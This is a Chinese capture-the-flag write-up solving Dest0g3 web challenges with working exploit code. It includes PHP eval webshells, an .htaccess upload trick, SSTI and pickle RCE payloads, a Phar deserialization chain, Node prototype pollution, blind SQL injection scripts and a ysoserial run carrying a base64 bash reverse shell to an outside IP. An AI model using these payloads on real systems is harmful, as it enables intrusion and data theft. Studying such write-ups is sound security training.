Web

phpdest

require_once限制了只能包含一次

?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

image-20220525214236103

得到的内容base64解码即可

EasyPHP

set_error_handler设置成了打印flag的函数

传一个数组让他报错就行了

image-20220525214402322

SimpleRCE

aaa=show_source(str_rot13('/synt'));

image-20220525214639699

funny_upload

php > echo base64_encode('<?php eval($_POST[0]);?>');
PD9waHAgZXZhbCgkX1BPU1RbMF0pOz8+

上传shell.png 内容就是这一串base64

然后上传.htaccess

AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/uploads/c47b21fcf8f0bc8b3920541abd8024fd/shell.png"

image-20220525221030844

或者

import socket
import string
import requests
import time
def send(flag,length):
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn",81))
    data = f'''POST / HTTP/1.1
Host: 2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11586810801148743996859451927
Content-Length: {length}
Origin: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
Connection: close
Referer: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/
Cookie: token=eyJhZG1pbiI6dHJ1ZX0.YBEFFA._EzwGG57OrghZrI9PTJv5uNm0hI
Upgrade-Insecure-Requests: 1

-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/png

<If "file('/flag')=~ /{flag}/">
ErrorDocument 404 "xux"
</If>
-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="1"

提交查询
-----------------------------11586810801148743996859451927--'''.replace('''
''','\\r\\n').split("\\r\\n")
    for i in data:
        temp = (i+"\r\n").encode()
        s.send(temp)
length = 400
d = string.digits + string.ascii_lowercase  +  r"_-{}" + string.ascii_uppercase
flag = "Dest0g3{"
for i in range(100):
    for t in d:
        send(flag+t,length)
        rep = requests.get("http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/aaa").text
        if 'xux' in rep:
            flag+=t
            length+=1
            print(flag)
            break
        time.sleep(0.1)

image-20220525222139902

EasySSTI

import requests
import re

url = "http://3fbb08f6-c806-4246-8e4c-b82d6b89a704.node4.buuoj.cn:81/login"
#a=pop
#b=_
#c=__globals__
#d=getitems
#e=os
#f= 
#g=/
#flag=cat /flag
payload =  '''{%set
a=dict(po=aa,p=aa)|join%}{%set
b=lipsum|string|list|attr(a)(18)%}{%set
c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set
d=(b,b,dict(ge=cc,tit=dd,em=aa)|join,b,b)|join%}{%set
e=dict(o=cc,s=aa)|join%}{%set
f=lipsum|string|list|attr(a)(9)%}{%set
g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-8)%}{%set
flag=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%set
h=(a,dict(en=aa)|join|join)|join%}{%set
i=dict(re=aa,ad=aa)|join%}{%set
z=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-5)%}{{lipsum|attr(c)|attr(d)(e)|attr(h)(flag)|attr(i)()}}'''
print(payload)
data = {
    "username":payload,
    "password":"xux"
}
rep = requests.post(url=url,data=data).text
print(rep)

image-20220525222242251

middle

写opcode,比较简单,往栈中压一个列表即可

import pickle
import pickletools
import base64
import requests
# poc = '__import__("os").system("whoami")'
poc = b'''cconfig
backdoor
(]V__import__("os").popen("cat /flag.txt").read()
atR.'''
pickletools.dis(poc)
payload = base64.b64encode(poc)
print(payload)
rep = requests.post(url="http://2e0225b1-77e1-4b0c-8508-2b6b1b70bb4f.node4.buuoj.cn:81/home",data={"data":payload})
print(rep.text)

image-20220525222651024

PharPOP

<?php
class tree{
    public $name;
    public $act;
}
class apple{

}
class air{
    public $p;
}
$tree = new tree();
$air = new air();
$air->p->act = "SplFileObject";
$apple = new apple();


$apple->flag = "/fflaggg";
$tree->name = $apple;
$apple->xxx = $air;
echo serialize($tree);
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($tree);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();

运行得到exp.phar

将2改为3来绕过throw new Error("start");

image-20220527102718927

修改了phar文件后还要改一下签名

from hashlib import sha1
f = open("exp.phar",'rb').read()
s = f[:-28]
h = f[-8:]
newf = s + sha1(s).digest() + h
open("test.phar",'wb').write(newf)  

得到test.phar

因为waf有对传入的数据进行检测,过滤了php

使用gzip对test.phar压缩一次

最终exp:

import requests
import re
url  = "http://f7049b15-42dc-4336-b4a4-5c45454778f7.node4.buuoj.cn:81/"

def send():
    rep = requests.post(url=url,data={
        "1":'O:1:"D":10:{s:5:"start";s:1:"w";}',
        '0':open("test.phar.gz",'rb').read()
    }).text
    print(rep)

def hack(file):
    rep = requests.post(url=url,data = {
        "1":'O:1:"D":10:{s:5:"start";s:1:"r";}',
        "0":file
    }).text
    flag = re.findall(r"Dest0g3{.*?}",rep)[0]
    print(flag)
#send()
#/tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg
hack("phar:///tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg")

image-20220527103704826

ezip

新建一个shell.zip,其中含有一个1.php以及空的1.txt

1.php的内容为

<?php
eval($_POST[0]);
?>

打开010editor

image-20220527110156652

将1.txt改为/////

上传shell.zip,提示解压失败,但1.php已经被解压

image-20220527110224260

image-20220527110305531

看了一下没权限读flag

image-20220527110511476

image-20220527110542218

NodeSoEasy

image-20220527110714259

image-20220527110719921

污染escapeFn即可

{"__proto__":{"client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('fs').readFileSync('/flag');","compileDebug":true}}

image-20220527110905986

Really Easy SQL

import requests
import time
import string
url = "http://xxxxxx/index.php"

flag = "Dest0g3{"
for i in range(len(flag)+1,100):
    max = 127
    min = 32
    while(abs(max-min)>0):
        mid = (max+min)//2
        data = {
            #"username":f"admin',if((select(ascii(mid((group_concat(table_name)),{i},1)))from(information_schema.tables)where(table_schema=database()))>{mid},benchmark(100000,sha(1)),1))#",
            #"username":f"admin',if((select(ascii(mid((group_concat(column_name)),{i},1)))from(information_schema.columns)where(table_name='flaggg'))>{mid},benchmark(100000,sha(1)),1))#",
            "username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))>{mid},benchmark(900000,sha(1)),1))#",
            "password":"admin"
        }
        d1 = time.time()
        requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
        d2 = time.time()
        if d2-d1>1:
            min = mid + 1
        else:
            max = mid
        time.sleep(0.5)
    flag+=chr(max)
    print(flag)

easysql

跟前一题的区别好像是多过滤了大于和小于号

把脚本改一下

import requests
import time
import string
url = "http://xxxxxx/index.php"

s = string.digits + string.ascii_lowercase + "-}{"
ss = [ord(i) for i in s]
flag = "Dest0g3{8be"
for i in range(len(flag)+1,100):
    for t in ss:
        data = {
            "username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))={t},benchmark(900000,sha(1)),1))#",
            "password":"admin"
        }
        d1 = time.time()
        requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
        d2 = time.time()
        if d2-d1>2:
            flag+=chr(t)
            print(flag)
        time.sleep(0.5)

跑了半天QwQ

EzSerial

image-20220527112359723

user处的数据是java序列化后的数据的base64编码后的结果

推测在user处传入的数据会被base64解码后反序列化

import requests
import os
import base64

url = "http://9c8254ad-4ea0-43ba-88a0-51a12b53ce9c.node4.buuoj.cn:81/admin/index.jsp"

payloadlist = []
for i in range(1,8):
    payloadlist.append(f"CommonsCollections{i}")
for payload in payloadlist:
    payload = 'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ' + payload + ' "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTIuNDIuNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}" > payload'
    os.system(payload)
    exp = base64.b64encode(open("payload",'rb').read()).decode()
    print(exp)
    rep = requests.get(url=url,cookies={
        "JSESSIONID":"CB0DE07D94F9C047F6D52BCEE88A73E8", 
        "user":exp
    }).text
    

image-20220527112948140

下一篇